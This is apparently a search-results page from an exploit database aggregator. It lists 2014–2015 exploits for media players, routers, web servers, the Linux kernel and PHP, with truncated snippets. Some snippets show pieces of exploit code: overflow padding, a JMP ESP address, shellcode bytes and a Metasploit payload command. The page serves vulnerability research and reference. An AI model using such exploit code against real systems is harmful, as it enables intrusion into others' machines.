Lucene search

954 matches found

0day.today
added 2015/09/10 12:0 a.m., 56 views

PHP cgimode fpm writeprocmemfile bypass disable function demo Vulnerability

Exploit for php platform in category web applications ?php errorreporting0x66778899; settimelimit0x41424344; define'ZENDINIUSER', 10; define'ZENDINIPERDIR', 11; define'ZENDINISYSTEM', 12; / 00df9000-00e16000 rw-p 00000000 00:00 0 017ff000-01a51000 rw-p 00000000 00:00 0 heap...

7.1 AI score
Exploits: 0
0day.today
added 2015/04/27 12:0 a.m., 34 views

MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS) Exploit

Exploit for multiple platform in category remote exploits !/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture: MIPS Tested on: AirTies...

7.1 AI score, 0.65944 EPSS
Exploits: 14
myhack58
added 2015/03/07 12:0 a.m., 39 views

ElasticSearch command execution vulnerability: by perl to rally the shell-vulnerability warning-the black bar safety net

ElasticSearch is a search server based on Lucene. It provides a distributed, multi-user full-text search engine with a RESTful web interface. Elasticsearch is developed in Java and released as open source under the terms of the Apache License; it is the second most popular...

7.6 AI score
Exploits: 0
exploitpack
added 2015/01/14 6:30 p.m., 33 views

Dell-iDRAC-IPMI-1.5

Dell iDRAC IPMI v1.5 Implementation contains a flaw that is triggered as session IDs are assigned incrementally rather than randomly, and the overall pool is limited. This may allow a remote attacker to trivially predict session IDs, hijack a session, and inject arbitrary commands. from time import sleep...

5 CVSS, 0.8 AI score, 0.59576 EPSS
Exploits: 6
exploitpack
added 2015/01/05 4:31 p.m., 10 views

BlazeVideo-HDTV-Player-multi

Take a look at mona.py : awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ this is the old fashioned bug, i just try to make it universal : it has also been exploited by: import struct file = 'blazevideo-universal.plf' totalsize =...

7.2 AI score
Exploits: 0
exploitpack
added 2015/01/05 3:11 p.m., 12 views

ABBS-Audio-Media-Player-3.1-(.lst)

Exploit Title: ABBS Audio Media Player v3.1 .lst Buffer Overflow Version: v3.1 Date: 2013-05-04 from struct import pack file="exploit.lst" windows/exec CMD=calc.exe Encoder: x86/shikataganai powered by Metasploit msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode =...

1.1 AI score
Exploits: 0
exploitpack
added 2015/01/04 5:42 p.m., 8 views

MinaliC-Webserver-2.0.0

Exploit Title: MinaliC Webserver buffer overflow Date: 12 Apr 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://minalic.sourceforge.net/ Version: MinaliC Webserver 2.0.0 import socket import struct 74 bytes calc.exe from...

0.4 AI score
Exploits: 0
Packet Storm
added 2014/12/27 12:0 a.m., 17 views

jetAudio 8.1.3.2200 Crash Proof Of Concept

Exploit Title : jetAudio 8.1.3.2200 Basic m3u Crash POC Product : jetAudio Basic Date : 27.12.2014 Exploit Author : Hadji Samir [email protected] Software Link : http://www.jetaudio.com/download/ Vulnerable version : 8.1.3.2200 Basic Vendor Homepage : http://www.jetaudio.com/ Tested on : Windows 7...

7.4 AI score
Exploits: 0
0day.today
added 2014/11/26 12:0 a.m., 426 views

Linux Kernel libfutex Local Root for RHEL/CentOS 7.0.1406 Exploit

Exploit for linux platform in category local exploits / CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406 By Kaiqu Chen email protected Based on libfutex and the exploit for Android by GeoHot. Usage: $gcc exploit.c -o exploit -lpthread $./exploit / include include include include include include...

7.2 CVSS, 0.7136 EPSS
Exploits: 15
Tenable Nessus
added 2014/11/08 12:0 a.m., 40 views

RHEL 6 : kernel (RHSA-2014:1365)

Updated kernel packages that fix one security issue and several bugs are now available for Red Hat Enterprise Linux 6.4 Extended Update Support. Red Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System CVSS base score, which gives a...

6.9 CVSS, 5.3 AI score, 0.00041 EPSS
Exploits: 1, References: 3
Fedora
added 2014/10/10 4:6 p.m., 20 views

[SECURITY] Fedora 20 Update: ctags-5.8-16.fc20

Ctags generates an index or tag file of C language objects found in C source and header files. The index makes it easy for text editors or other utilities to locate the indexed items. Ctags can also generate a cross reference file which lists information about the various objects found in a set o...

5 CVSS, 0.5 AI score, 0.02725 EPSS
Exploits: 1
Packet Storm
added 2014/08/19 12:0 a.m., 28 views

BlazeDVD Pro 7.0 Buffer Overflow

BlazeDVD Pro v7.0 - .plf Buffer Overflow SEH Date: 19.08.2014 Exploit Author: metacom Vendor Homepage: http://www.blazevideo.com/ Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe Version: 7.0.0.0 Tested on: Win 7 EN, Win 8.1 !/usr/bin/python from struct import pack buffer=...

0.7 AI score
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m., 11 views

Android Web Browser - BMP File Integer Overflow Vulnerability

source: http://www.securityfocus.com/bid/28006/info Android Web Browser is prone to an integer-overflow vulnerability because it fails to adequately handle user-supplied data. Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts wil...

7.6 AI score
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m., 33 views

Linux Kernel Stack Infoleaks Vulnerability

No description provided by source. //Enjoy... // //-Dan / You've done it. After hours of gdb and caffeine, you've finally got a shell on your target's server. Maybe next time they will think twice about running MyFirstCompSciProjectFTPD on a production machine. As you take another sip of Mountain...

7.1 AI score
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m., 43 views

HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution

No description provided by source. Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution Date: 2010.07.02 Author: S2 Crew Hungary Software Link: hp.com Version: 7.53 Tested on: Windows 2003 CVE: CVE-2010-1554 Code : !/usr/bin/python import struct import socket...

10 CVSS, 6.5 AI score, 0.81439 EPSS
Exploits: 13
seebug.org
added 2014/07/01 12:0 a.m., 20 views

Linksys Devices 1.42/1.43 GET Request Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/6301/info Several Linksys Broadband Router devices are prone to a buffer overflow condition. The vulnerability occurs due to insufficient allocation of memory for buffers. An attacker can exploit this vulnerability by...

7.1 AI score
Exploits: 0
Exploit DB
added 2014/03/30 12:0 a.m., 16 views

AudioCoder 0.8.29 - Memory Corruption (SEH)

Exploit Title: AudioCoder-0.8.29 Memory Corruption to Code executionSEH Author: sajith version: AudioCoder-0.8.29 vulnerable app link: http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.29.exe Tested in windows Xp sp3,english import struct rawinput"Letz start...

7 AI score
Exploits: 0
0day.today
added 2014/03/10 12:0 a.m., 24 views

KMPlayer 3.8.0.117 - Buffer Overflow Exploit

Exploit for windows platform in category local exploits import struct def littleendianaddress: return struct.pack"L",address junk = "\x41" 250 eip = littleendian0x7C86467B 7C86467B FFE4 JMP ESP kernel32.dll shellcode= "\x31\xC9" // xor ecx,ecx "\x51" // push ecx "\x68\x63\x61\x6C\x63" // push...

6.8 AI score
Exploits: 0
exploitpack
added 2014/02/24 12:0 a.m., 91 views

Python - socket.recvfrom_into() Remote Buffer Overflow

Python - socket.recvfrominto Remote Buffer Overflow !/usr/bin/env python ''' Exploit Title: python socket.recvfrominto remote buffer overflow Date: 21/02/2014 Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-19...

7.5 CVSS, 1.2 AI score, 0.33997 EPSS
Exploits: 7
Exploit DB
added 2014/02/22 12:0 a.m., 30 views

SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write

''' Title: SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write Vulnerability Date: 2-21-2014 Author: Mohamed Shetta Email: mshetta |at| live |dot| com Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm Tested on: Windows 7 Vulnerability type:...

7.4 AI score
Exploits: 0